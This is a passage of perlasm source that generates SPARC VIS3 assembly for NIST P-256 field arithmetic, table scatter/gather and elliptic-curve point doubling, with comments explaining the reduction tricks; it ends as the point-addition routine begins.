st %l3,[$out+64*3-4]
st %l4,[$out+64*4-4]
st %l5,[$out+64*5-4]
st %l6,[$out+64*6-4]
st %l7,[$out+64*7-4]
ret
restore
.size ecp_nistz256_scatter_w5,.-ecp_nistz256_scatter_w5
! void ecp_nistz256_gather_w5(P256_POINT *%i0,const void *%i1,
! int %i2);
.globl ecp_nistz256_gather_w5
.align 32
ecp_nistz256_gather_w5:
save %sp,-STACK_FRAME,%sp
neg $index,$mask
srax $mask,63,$mask
add $index,$mask,$index
sll $index,2,$index
add $inp,$index,$inp
ld [$inp+64*0],%l0
ld [$inp+64*1],%l1
ld [$inp+64*2],%l2
ld [$inp+64*3],%l3
ld [$inp+64*4],%l4
ld [$inp+64*5],%l5
ld [$inp+64*6],%l6
ld [$inp+64*7],%l7
add $inp,64*8,$inp
and %l0,$mask,%l0
and %l1,$mask,%l1
st %l0,[$out] ! X
and %l2,$mask,%l2
st %l1,[$out+4]
and %l3,$mask,%l3
st %l2,[$out+8]
and %l4,$mask,%l4
st %l3,[$out+12]
and %l5,$mask,%l5
st %l4,[$out+16]
and %l6,$mask,%l6
st %l5,[$out+20]
and %l7,$mask,%l7
st %l6,[$out+24]
st %l7,[$out+28]
add $out,32,$out
ld [$inp+64*0],%l0
ld [$inp+64*1],%l1
ld [$inp+64*2],%l2
ld [$inp+64*3],%l3
ld [$inp+64*4],%l4
ld [$inp+64*5],%l5
ld [$inp+64*6],%l6
ld [$inp+64*7],%l7
add $inp,64*8,$inp
and %l0,$mask,%l0
and %l1,$mask,%l1
st %l0,[$out] ! Y
and %l2,$mask,%l2
st %l1,[$out+4]
and %l3,$mask,%l3
st %l2,[$out+8]
and %l4,$mask,%l4
st %l3,[$out+12]
and %l5,$mask,%l5
st %l4,[$out+16]
and %l6,$mask,%l6
st %l5,[$out+20]
and %l7,$mask,%l7
st %l6,[$out+24]
st %l7,[$out+28]
add $out,32,$out
ld [$inp+64*0],%l0
ld [$inp+64*1],%l1
ld [$inp+64*2],%l2
ld [$inp+64*3],%l3
ld [$inp+64*4],%l4
ld [$inp+64*5],%l5
ld [$inp+64*6],%l6
ld [$inp+64*7],%l7
and %l0,$mask,%l0
and %l1,$mask,%l1
st %l0,[$out] ! Z
and %l2,$mask,%l2
st %l1,[$out+4]
and %l3,$mask,%l3
st %l2,[$out+8]
and %l4,$mask,%l4
st %l3,[$out+12]
and %l5,$mask,%l5
st %l4,[$out+16]
and %l6,$mask,%l6
st %l5,[$out+20]
and %l7,$mask,%l7
st %l6,[$out+24]
st %l7,[$out+28]
ret
restore
.size ecp_nistz256_gather_w5,.-ecp_nistz256_gather_w5
! void ecp_nistz256_scatter_w7(void *%i0,const P256_POINT_AFFINE *%i1,
! int %i2);
.globl ecp_nistz256_scatter_w7
.align 32
ecp_nistz256_scatter_w7:
save %sp,-STACK_FRAME,%sp
nop
add $out,$index,$out
mov 64/4,$index
.Loop_scatter_w7:
ld [$inp],%l0
add $inp,4,$inp
subcc $index,1,$index
stb %l0,[$out+64*0-1]
srl %l0,8,%l1
stb %l1,[$out+64*1-1]
srl %l0,16,%l2
stb %l2,[$out+64*2-1]
srl %l0,24,%l3
stb %l3,[$out+64*3-1]
bne .Loop_scatter_w7
add $out,64*4,$out
ret
restore
.size ecp_nistz256_scatter_w7,.-ecp_nistz256_scatter_w7
! void ecp_nistz256_gather_w7(P256_POINT_AFFINE *%i0,const void *%i1,
! int %i2);
.globl ecp_nistz256_gather_w7
.align 32
ecp_nistz256_gather_w7:
save %sp,-STACK_FRAME,%sp
neg $index,$mask
srax $mask,63,$mask
add $index,$mask,$index
add $inp,$index,$inp
mov 64/4,$index
.Loop_gather_w7:
ldub [$inp+64*0],%l0
prefetch [$inp+3840+64*0],1
subcc $index,1,$index
ldub [$inp+64*1],%l1
prefetch [$inp+3840+64*1],1
ldub [$inp+64*2],%l2
prefetch [$inp+3840+64*2],1
ldub [$inp+64*3],%l3
prefetch [$inp+3840+64*3],1
add $inp,64*4,$inp
sll %l1,8,%l1
sll %l2,16,%l2
or %l0,%l1,%l0
sll %l3,24,%l3
or %l0,%l2,%l0
or %l0,%l3,%l0
and %l0,$mask,%l0
st %l0,[$out]
bne .Loop_gather_w7
add $out,4,$out
ret
restore
.size ecp_nistz256_gather_w7,.-ecp_nistz256_gather_w7
___
}}}
{{{
########################################################################
# Following subroutines are VIS3 counterparts of those above that
# implement ones found in ecp_nistz256.c. Key difference is that they
# use 128-bit multiplication and addition with 64-bit carry, and in order
# to do that they perform conversion from uint32_t[8] to uint64_t[4] upon
# entry and vice versa on return.
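# The conversion itself is just a repacking of adjacent words,
# a64[i] = a32[2*i] | (a32[2*i+1] << 32), which is what the
# ld/sllx/or sequences at the VIS3 entry points below implement.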
#
my ($rp,$ap,$bp)=map("%i$_",(0..2));
my ($t0,$t1,$t2,$t3,$a0,$a1,$a2,$a3)=map("%l$_",(0..7));
my ($acc0,$acc1,$acc2,$acc3,$acc4,$acc5)=map("%o$_",(0..5));
my ($bi,$poly1,$poly3,$minus1)=(map("%i$_",(3..5)),"%g1");
my ($rp_real,$ap_real)=("%g2","%g3");
my ($acc6,$acc7)=($bp,$bi); # used in squaring
$code.=<<___;
.align 32
__ecp_nistz256_mul_by_2_vis3:
addcc $acc0,$acc0,$acc0
addxccc $acc1,$acc1,$acc1
addxccc $acc2,$acc2,$acc2
addxccc $acc3,$acc3,$acc3
b .Lreduce_by_sub_vis3
addxc %g0,%g0,$acc4 ! did it carry?
.size __ecp_nistz256_mul_by_2_vis3,.-__ecp_nistz256_mul_by_2_vis3
.align 32
__ecp_nistz256_add_vis3:
ldx [$bp+0],$t0
ldx [$bp+8],$t1
ldx [$bp+16],$t2
ldx [$bp+24],$t3
__ecp_nistz256_add_noload_vis3:
addcc $t0,$acc0,$acc0
addxccc $t1,$acc1,$acc1
addxccc $t2,$acc2,$acc2
addxccc $t3,$acc3,$acc3
addxc %g0,%g0,$acc4 ! did it carry?
.Lreduce_by_sub_vis3:
addcc $acc0,1,$t0 ! add -modulus, i.e. subtract
addxccc $acc1,$poly1,$t1
addxccc $acc2,$minus1,$t2
addxc $acc3,$poly3,$t3
movrnz $acc4,$t0,$acc0 ! if a+b carried, ret = ret-mod
movrnz $acc4,$t1,$acc1
stx $acc0,[$rp]
movrnz $acc4,$t2,$acc2
stx $acc1,[$rp+8]
movrnz $acc4,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_add_vis3,.-__ecp_nistz256_add_vis3
! Trouble with subtraction is that there is no subtraction with 64-bit
! borrow, only with 32-bit one. For this reason we "decompose" 64-bit
! $acc0-$acc3 to 32-bit values and pick b[4] in 32-bit pieces. But
! recall that SPARC is big-endian, which is why you'll observe that
! b[4] is accessed as 4-0-12-8-20-16-28-24. And prior reduction we
! "collect" result back to 64-bit $acc0-$acc3.
.align 32
__ecp_nistz256_sub_from_vis3:
ld [$bp+4],$t0
ld [$bp+0],$t1
ld [$bp+12],$t2
ld [$bp+8],$t3
srlx $acc0,32,$acc4
not $poly1,$poly1
srlx $acc1,32,$acc5
subcc $acc0,$t0,$acc0
ld [$bp+20],$t0
subccc $acc4,$t1,$acc4
ld [$bp+16],$t1
subccc $acc1,$t2,$acc1
ld [$bp+28],$t2
and $acc0,$poly1,$acc0
subccc $acc5,$t3,$acc5
ld [$bp+24],$t3
sllx $acc4,32,$acc4
and $acc1,$poly1,$acc1
sllx $acc5,32,$acc5
or $acc0,$acc4,$acc0
srlx $acc2,32,$acc4
or $acc1,$acc5,$acc1
srlx $acc3,32,$acc5
subccc $acc2,$t0,$acc2
subccc $acc4,$t1,$acc4
subccc $acc3,$t2,$acc3
and $acc2,$poly1,$acc2
subccc $acc5,$t3,$acc5
sllx $acc4,32,$acc4
and $acc3,$poly1,$acc3
sllx $acc5,32,$acc5
or $acc2,$acc4,$acc2
subc %g0,%g0,$acc4 ! did it borrow?
b .Lreduce_by_add_vis3
or $acc3,$acc5,$acc3
.size __ecp_nistz256_sub_from_vis3,.-__ecp_nistz256_sub_from_vis3
.align 32
__ecp_nistz256_sub_morf_vis3:
ld [$bp+4],$t0
ld [$bp+0],$t1
ld [$bp+12],$t2
ld [$bp+8],$t3
srlx $acc0,32,$acc4
not $poly1,$poly1
srlx $acc1,32,$acc5
subcc $t0,$acc0,$acc0
ld [$bp+20],$t0
subccc $t1,$acc4,$acc4
ld [$bp+16],$t1
subccc $t2,$acc1,$acc1
ld [$bp+28],$t2
and $acc0,$poly1,$acc0
subccc $t3,$acc5,$acc5
ld [$bp+24],$t3
sllx $acc4,32,$acc4
and $acc1,$poly1,$acc1
sllx $acc5,32,$acc5
or $acc0,$acc4,$acc0
srlx $acc2,32,$acc4
or $acc1,$acc5,$acc1
srlx $acc3,32,$acc5
subccc $t0,$acc2,$acc2
subccc $t1,$acc4,$acc4
subccc $t2,$acc3,$acc3
and $acc2,$poly1,$acc2
subccc $t3,$acc5,$acc5
sllx $acc4,32,$acc4
and $acc3,$poly1,$acc3
sllx $acc5,32,$acc5
or $acc2,$acc4,$acc2
subc %g0,%g0,$acc4 ! did it borrow?
or $acc3,$acc5,$acc3
.Lreduce_by_add_vis3:
addcc $acc0,-1,$t0 ! add modulus
not $poly3,$t3
addxccc $acc1,$poly1,$t1
not $poly1,$poly1 ! restore $poly1
addxccc $acc2,%g0,$t2
addxc $acc3,$t3,$t3
movrnz $acc4,$t0,$acc0 ! if a-b borrowed, ret = ret+mod
movrnz $acc4,$t1,$acc1
stx $acc0,[$rp]
movrnz $acc4,$t2,$acc2
stx $acc1,[$rp+8]
movrnz $acc4,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_sub_morf_vis3,.-__ecp_nistz256_sub_morf_vis3
.align 32
__ecp_nistz256_div_by_2_vis3:
! ret = (a is odd ? a+mod : a) >> 1
not $poly1,$t1
not $poly3,$t3
and $acc0,1,$acc5
addcc $acc0,-1,$t0 ! add modulus
addxccc $acc1,$t1,$t1
addxccc $acc2,%g0,$t2
addxccc $acc3,$t3,$t3
addxc %g0,%g0,$acc4 ! carry bit
movrnz $acc5,$t0,$acc0
movrnz $acc5,$t1,$acc1
movrnz $acc5,$t2,$acc2
movrnz $acc5,$t3,$acc3
movrz $acc5,%g0,$acc4
! ret >>= 1
srlx $acc0,1,$acc0
sllx $acc1,63,$t0
srlx $acc1,1,$acc1
or $acc0,$t0,$acc0
sllx $acc2,63,$t1
srlx $acc2,1,$acc2
or $acc1,$t1,$acc1
sllx $acc3,63,$t2
stx $acc0,[$rp]
srlx $acc3,1,$acc3
or $acc2,$t2,$acc2
sllx $acc4,63,$t3 ! don't forget carry bit
stx $acc1,[$rp+8]
or $acc3,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_div_by_2_vis3,.-__ecp_nistz256_div_by_2_vis3
! compared to __ecp_nistz256_mul_mont it's almost 4x smaller and
! 4x faster [on T4]...
.align 32
__ecp_nistz256_mul_mont_vis3:
mulx $a0,$bi,$acc0
not $poly3,$poly3 ! 0xFFFFFFFF00000001
umulxhi $a0,$bi,$t0
mulx $a1,$bi,$acc1
umulxhi $a1,$bi,$t1
mulx $a2,$bi,$acc2
umulxhi $a2,$bi,$t2
mulx $a3,$bi,$acc3
umulxhi $a3,$bi,$t3
ldx [$bp+8],$bi ! b[1]
addcc $acc1,$t0,$acc1 ! accumulate high parts of multiplication
sllx $acc0,32,$t0
addxccc $acc2,$t1,$acc2
srlx $acc0,32,$t1
addxccc $acc3,$t2,$acc3
addxc %g0,$t3,$acc4
mov 0,$acc5
___
for($i=1;$i<4;$i++) {
# Reduction iteration is normally performed by accumulating
# result of multiplication of modulus by "magic" digit [and
# omitting least significant word, which is guaranteed to
# be 0], but thanks to special form of modulus and "magic"
# digit being equal to least significant word, it can be
# performed with additions and subtractions alone. Indeed:
#
# ffff0001.00000000.0000ffff.ffffffff
# * abcdefgh
# + xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx.abcdefgh
#
# Now observing that ff..ff*x = (2^n-1)*x = 2^n*x-x, we
# rewrite above as:
#
# xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx.abcdefgh
# + abcdefgh.abcdefgh.0000abcd.efgh0000.00000000
# - 0000abcd.efgh0000.00000000.00000000.abcdefgh
#
# or marking redundant operations:
#
# xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx.--------
# + abcdefgh.abcdefgh.0000abcd.efgh0000.--------
# - 0000abcd.efgh0000.--------.--------.--------
# ^^^^^^^^ but this word is calculated with umulxhi, because
# there is no subtract with 64-bit borrow:-(
$code.=<<___;
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
mulx $a0,$bi,$t0
addxccc $acc2,$t1,$acc1
mulx $a1,$bi,$t1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
mulx $a2,$bi,$t2
addxccc $acc4,$t3,$acc3
mulx $a3,$bi,$t3
addxc $acc5,%g0,$acc4
addcc $acc0,$t0,$acc0 ! accumulate low parts of multiplication
umulxhi $a0,$bi,$t0
addxccc $acc1,$t1,$acc1
umulxhi $a1,$bi,$t1
addxccc $acc2,$t2,$acc2
umulxhi $a2,$bi,$t2
addxccc $acc3,$t3,$acc3
umulxhi $a3,$bi,$t3
addxc $acc4,%g0,$acc4
___
$code.=<<___ if ($i<3);
ldx [$bp+8*($i+1)],$bi ! bp[$i+1]
___
$code.=<<___;
addcc $acc1,$t0,$acc1 ! accumulate high parts of multiplication
sllx $acc0,32,$t0
addxccc $acc2,$t1,$acc2
srlx $acc0,32,$t1
addxccc $acc3,$t2,$acc3
addxccc $acc4,$t3,$acc4
addxc %g0,%g0,$acc5
___
}
$code.=<<___;
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
addxccc $acc2,$t1,$acc1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
addxccc $acc4,$t3,$acc3
b .Lmul_final_vis3 ! see below
addxc $acc5,%g0,$acc4
.size __ecp_nistz256_mul_mont_vis3,.-__ecp_nistz256_mul_mont_vis3
! compared to above __ecp_nistz256_mul_mont_vis3 it's 21% less
! instructions, but only 14% faster [on T4]...
.align 32
__ecp_nistz256_sqr_mont_vis3:
! | | | | | |a1*a0| |
! | | | | |a2*a0| | |
! | |a3*a2|a3*a0| | | |
! | | | |a2*a1| | | |
! | | |a3*a1| | | | |
! *| | | | | | | | 2|
! +|a3*a3|a2*a2|a1*a1|a0*a0|
! |--+--+--+--+--+--+--+--|
! |A7|A6|A5|A4|A3|A2|A1|A0|, where Ax is $accx, i.e. follow $accx
!
! "can't overflow" below mark carrying into high part of
! multiplication result, which can't overflow, because it
! can never be all ones.
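	! Off-diagonal products a[i]*a[j], i<j, are computed once, that
	! partial sum is doubled (acc[1-6]*=2 below), and the diagonal
	! squares a[i]*a[i] are then added on top, following the schedule
	! drawn above.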
mulx $a1,$a0,$acc1 ! a[1]*a[0]
umulxhi $a1,$a0,$t1
mulx $a2,$a0,$acc2 ! a[2]*a[0]
umulxhi $a2,$a0,$t2
mulx $a3,$a0,$acc3 ! a[3]*a[0]
umulxhi $a3,$a0,$acc4
addcc $acc2,$t1,$acc2 ! accumulate high parts of multiplication
mulx $a2,$a1,$t0 ! a[2]*a[1]
umulxhi $a2,$a1,$t1
addxccc $acc3,$t2,$acc3
mulx $a3,$a1,$t2 ! a[3]*a[1]
umulxhi $a3,$a1,$t3
addxc $acc4,%g0,$acc4 ! can't overflow
mulx $a3,$a2,$acc5 ! a[3]*a[2]
not $poly3,$poly3 ! 0xFFFFFFFF00000001
umulxhi $a3,$a2,$acc6
addcc $t2,$t1,$t1 ! accumulate high parts of multiplication
mulx $a0,$a0,$acc0 ! a[0]*a[0]
addxc $t3,%g0,$t2 ! can't overflow
addcc $acc3,$t0,$acc3 ! accumulate low parts of multiplication
umulxhi $a0,$a0,$a0
addxccc $acc4,$t1,$acc4
mulx $a1,$a1,$t1 ! a[1]*a[1]
addxccc $acc5,$t2,$acc5
umulxhi $a1,$a1,$a1
addxc $acc6,%g0,$acc6 ! can't overflow
addcc $acc1,$acc1,$acc1 ! acc[1-6]*=2
mulx $a2,$a2,$t2 ! a[2]*a[2]
addxccc $acc2,$acc2,$acc2
umulxhi $a2,$a2,$a2
addxccc $acc3,$acc3,$acc3
mulx $a3,$a3,$t3 ! a[3]*a[3]
addxccc $acc4,$acc4,$acc4
umulxhi $a3,$a3,$a3
addxccc $acc5,$acc5,$acc5
addxccc $acc6,$acc6,$acc6
addxc %g0,%g0,$acc7
addcc $acc1,$a0,$acc1 ! +a[i]*a[i]
addxccc $acc2,$t1,$acc2
addxccc $acc3,$a1,$acc3
addxccc $acc4,$t2,$acc4
sllx $acc0,32,$t0
addxccc $acc5,$a2,$acc5
srlx $acc0,32,$t1
addxccc $acc6,$t3,$acc6
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
addxc $acc7,$a3,$acc7
___
for($i=0;$i<3;$i++) { # reductions, see commentary
# in multiplication for details
$code.=<<___;
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
sllx $acc0,32,$t0
addxccc $acc2,$t1,$acc1
srlx $acc0,32,$t1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
sub $acc0,$t0,$t2 ! acc0*0xFFFFFFFF00000001, low part
	addxc	%g0,$t3,$acc3		! can't overflow
___
}
$code.=<<___;
umulxhi $acc0,$poly3,$t3 ! acc0*0xFFFFFFFF00000001, high part
addcc $acc1,$t0,$acc0 ! +=acc[0]<<96 and omit acc[0]
addxccc $acc2,$t1,$acc1
addxccc $acc3,$t2,$acc2 ! +=acc[0]*0xFFFFFFFF00000001
addxc %g0,$t3,$acc3 ! can't overflow
addcc $acc0,$acc4,$acc0 ! accumulate upper half
addxccc $acc1,$acc5,$acc1
addxccc $acc2,$acc6,$acc2
addxccc $acc3,$acc7,$acc3
addxc %g0,%g0,$acc4
.Lmul_final_vis3:
! Final step is "if result > mod, subtract mod", but as comparison
! means subtraction, we do the subtraction and then copy outcome
! if it didn't borrow. But note that as we [have to] replace
! subtraction with addition with negative, carry/borrow logic is
! inverse.
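	! (Illustrative example with 4-bit words: 9-3 done as 9+13 = 0x16 leaves
	! 6 with carry set, i.e. no borrow; 3-9 done as 3+7 = 0x0a leaves 10 with
	! carry clear, i.e. borrow.  Hence carry set below means the subtraction
	! did not underflow and the subtracted copy is the one to keep.)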
addcc $acc0,1,$t0 ! add -modulus, i.e. subtract
not $poly3,$poly3 ! restore 0x00000000FFFFFFFE
addxccc $acc1,$poly1,$t1
addxccc $acc2,$minus1,$t2
addxccc $acc3,$poly3,$t3
addxccc $acc4,$minus1,%g0 ! did it carry?
movcs %xcc,$t0,$acc0
movcs %xcc,$t1,$acc1
stx $acc0,[$rp]
movcs %xcc,$t2,$acc2
stx $acc1,[$rp+8]
movcs %xcc,$t3,$acc3
stx $acc2,[$rp+16]
retl
stx $acc3,[$rp+24]
.size __ecp_nistz256_sqr_mont_vis3,.-__ecp_nistz256_sqr_mont_vis3
___
########################################################################
# void ecp_nistz256_point_double(P256_POINT *out,const P256_POINT *inp);
#
{
my ($res_x,$res_y,$res_z,
$in_x,$in_y,$in_z,
$S,$M,$Zsqr,$tmp0)=map(32*$_,(0..9));
# above map() describes stack layout with 10 temporary
# 256-bit vectors on top.
$code.=<<___;
.align 32
ecp_nistz256_point_double_vis3:
save %sp,-STACK64_FRAME-32*10,%sp
mov $rp,$rp_real
.Ldouble_shortcut_vis3:
mov -1,$minus1
mov -2,$poly3
sllx $minus1,32,$poly1 ! 0xFFFFFFFF00000000
srl $poly3,0,$poly3 ! 0x00000000FFFFFFFE
! convert input to uint64_t[4]
ld [$ap],$a0 ! in_x
ld [$ap+4],$t0
ld [$ap+8],$a1
ld [$ap+12],$t1
ld [$ap+16],$a2
ld [$ap+20],$t2
ld [$ap+24],$a3
ld [$ap+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$ap+32],$acc0 ! in_y
or $a0,$t0,$a0
ld [$ap+32+4],$t0
sllx $t2,32,$t2
ld [$ap+32+8],$acc1
or $a1,$t1,$a1
ld [$ap+32+12],$t1
sllx $t3,32,$t3
ld [$ap+32+16],$acc2
or $a2,$t2,$a2
ld [$ap+32+20],$t2
or $a3,$t3,$a3
ld [$ap+32+24],$acc3
sllx $t0,32,$t0
ld [$ap+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in_y+16]
stx $acc3,[%sp+LOCALS64+$in_y+24]
ld [$ap+64],$a0 ! in_z
ld [$ap+64+4],$t0
ld [$ap+64+8],$a1
ld [$ap+64+12],$t1
ld [$ap+64+16],$a2
ld [$ap+64+20],$t2
ld [$ap+64+24],$a3
ld [$ap+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
or $a0,$t0,$a0
sllx $t2,32,$t2
or $a1,$t1,$a1
sllx $t3,32,$t3
or $a2,$t2,$a2
or $a3,$t3,$a3
sllx $t0,32,$t0
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in_z]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in_z+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in_z+16]
stx $a3,[%sp+LOCALS64+$in_z+24]
! in_y is still in $acc0-$acc3
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(S, in_y);
add %sp,LOCALS64+$S,$rp
! in_z is still in $a0-$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Zsqr, in_z);
add %sp,LOCALS64+$Zsqr,$rp
mov $acc0,$a0 ! put Zsqr aside
mov $acc1,$a1
mov $acc2,$a2
mov $acc3,$a3
add %sp,LOCALS64+$in_x,$bp
call __ecp_nistz256_add_vis3 ! p256_add(M, Zsqr, in_x);
add %sp,LOCALS64+$M,$rp
mov $a0,$acc0 ! restore Zsqr
ldx [%sp+LOCALS64+$S],$a0 ! forward load
mov $a1,$acc1
ldx [%sp+LOCALS64+$S+8],$a1
mov $a2,$acc2
ldx [%sp+LOCALS64+$S+16],$a2
mov $a3,$acc3
ldx [%sp+LOCALS64+$S+24],$a3
add %sp,LOCALS64+$in_x,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(Zsqr, in_x, Zsqr);
add %sp,LOCALS64+$Zsqr,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(S, S);
add %sp,LOCALS64+$S,$rp
ldx [%sp+LOCALS64+$in_z],$bi
ldx [%sp+LOCALS64+$in_y],$a0
ldx [%sp+LOCALS64+$in_y+8],$a1
ldx [%sp+LOCALS64+$in_y+16],$a2
ldx [%sp+LOCALS64+$in_y+24],$a3
add %sp,LOCALS64+$in_z,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(tmp0, in_z, in_y);
add %sp,LOCALS64+$tmp0,$rp
ldx [%sp+LOCALS64+$M],$bi ! forward load
ldx [%sp+LOCALS64+$Zsqr],$a0
ldx [%sp+LOCALS64+$Zsqr+8],$a1
ldx [%sp+LOCALS64+$Zsqr+16],$a2
ldx [%sp+LOCALS64+$Zsqr+24],$a3
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(res_z, tmp0);
add %sp,LOCALS64+$res_z,$rp
add %sp,LOCALS64+$M,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(M, M, Zsqr);
add %sp,LOCALS64+$M,$rp
mov $acc0,$a0 ! put aside M
mov $acc1,$a1
mov $acc2,$a2
mov $acc3,$a3
call __ecp_nistz256_mul_by_2_vis3
add %sp,LOCALS64+$M,$rp
mov $a0,$t0 ! copy M
ldx [%sp+LOCALS64+$S],$a0 ! forward load
mov $a1,$t1
ldx [%sp+LOCALS64+$S+8],$a1
mov $a2,$t2
ldx [%sp+LOCALS64+$S+16],$a2
mov $a3,$t3
ldx [%sp+LOCALS64+$S+24],$a3
call __ecp_nistz256_add_noload_vis3 ! p256_mul_by_3(M, M);
add %sp,LOCALS64+$M,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(tmp0, S);
add %sp,LOCALS64+$tmp0,$rp
ldx [%sp+LOCALS64+$S],$bi ! forward load
ldx [%sp+LOCALS64+$in_x],$a0
ldx [%sp+LOCALS64+$in_x+8],$a1
ldx [%sp+LOCALS64+$in_x+16],$a2
ldx [%sp+LOCALS64+$in_x+24],$a3
call __ecp_nistz256_div_by_2_vis3 ! p256_div_by_2(res_y, tmp0);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S, S, in_x);
add %sp,LOCALS64+$S,$rp
ldx [%sp+LOCALS64+$M],$a0 ! forward load
ldx [%sp+LOCALS64+$M+8],$a1
ldx [%sp+LOCALS64+$M+16],$a2
ldx [%sp+LOCALS64+$M+24],$a3
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(tmp0, S);
add %sp,LOCALS64+$tmp0,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(res_x, M);
add %sp,LOCALS64+$res_x,$rp
add %sp,LOCALS64+$tmp0,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_x, res_x, tmp0);
add %sp,LOCALS64+$res_x,$rp
ldx [%sp+LOCALS64+$M],$a0 ! forward load
ldx [%sp+LOCALS64+$M+8],$a1
ldx [%sp+LOCALS64+$M+16],$a2
ldx [%sp+LOCALS64+$M+24],$a3
add %sp,LOCALS64+$S,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(S, S, res_x);
add %sp,LOCALS64+$S,$rp
mov $acc0,$bi
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S, S, M);
add %sp,LOCALS64+$S,$rp
ldx [%sp+LOCALS64+$res_x],$a0 ! forward load
ldx [%sp+LOCALS64+$res_x+8],$a1
ldx [%sp+LOCALS64+$res_x+16],$a2
ldx [%sp+LOCALS64+$res_x+24],$a3
add %sp,LOCALS64+$res_y,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_y, S, res_y);
	add	%sp,LOCALS64+$res_y,$rp
! convert output to uint_32[8]
srlx $a0,32,$t0
srlx $a1,32,$t1
st $a0,[$rp_real] ! res_x
srlx $a2,32,$t2
st $t0,[$rp_real+4]
srlx $a3,32,$t3
st $a1,[$rp_real+8]
st $t1,[$rp_real+12]
st $a2,[$rp_real+16]
st $t2,[$rp_real+20]
st $a3,[$rp_real+24]
st $t3,[$rp_real+28]
ldx [%sp+LOCALS64+$res_z],$a0 ! forward load
srlx $acc0,32,$t0
ldx [%sp+LOCALS64+$res_z+8],$a1
srlx $acc1,32,$t1
ldx [%sp+LOCALS64+$res_z+16],$a2
srlx $acc2,32,$t2
ldx [%sp+LOCALS64+$res_z+24],$a3
srlx $acc3,32,$t3
st $acc0,[$rp_real+32] ! res_y
st $t0, [$rp_real+32+4]
st $acc1,[$rp_real+32+8]
st $t1, [$rp_real+32+12]
st $acc2,[$rp_real+32+16]
st $t2, [$rp_real+32+20]
st $acc3,[$rp_real+32+24]
st $t3, [$rp_real+32+28]
srlx $a0,32,$t0
srlx $a1,32,$t1
st $a0,[$rp_real+64] ! res_z
srlx $a2,32,$t2
st $t0,[$rp_real+64+4]
srlx $a3,32,$t3
st $a1,[$rp_real+64+8]
st $t1,[$rp_real+64+12]
st $a2,[$rp_real+64+16]
st $t2,[$rp_real+64+20]
st $a3,[$rp_real+64+24]
st $t3,[$rp_real+64+28]
ret
restore
.size ecp_nistz256_point_double_vis3,.-ecp_nistz256_point_double_vis3
___
}
########################################################################
# void ecp_nistz256_point_add(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT *in2);
{
my ($res_x,$res_y,$res_z,
$in1_x,$in1_y,$in1_z,
$in2_x,$in2_y,$in2_z,
$H,$Hsqr,$R,$Rsqr,$Hcub,
$U1,$U2,$S1,$S2)=map(32*$_,(0..17));
my ($Z1sqr, $Z2sqr) = ($Hsqr, $Rsqr);
# above map() describes stack layout with 18 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty, !in2infty and result of check for zero.
$code.=<<___;
.globl ecp_nistz256_point_add_vis3
.align 32
ecp_nistz256_point_add_vis3:
save %sp,-STACK64_FRAME-32*18-32,%sp
mov $rp,$rp_real
mov -1,$minus1
mov -2,$poly3
sllx $minus1,32,$poly1 ! 0xFFFFFFFF00000000
srl $poly3,0,$poly3 ! 0x00000000FFFFFFFE
! convert input to uint64_t[4]
ld [$bp],$a0 ! in2_x
ld [$bp+4],$t0
ld [$bp+8],$a1
ld [$bp+12],$t1
ld [$bp+16],$a2
ld [$bp+20],$t2
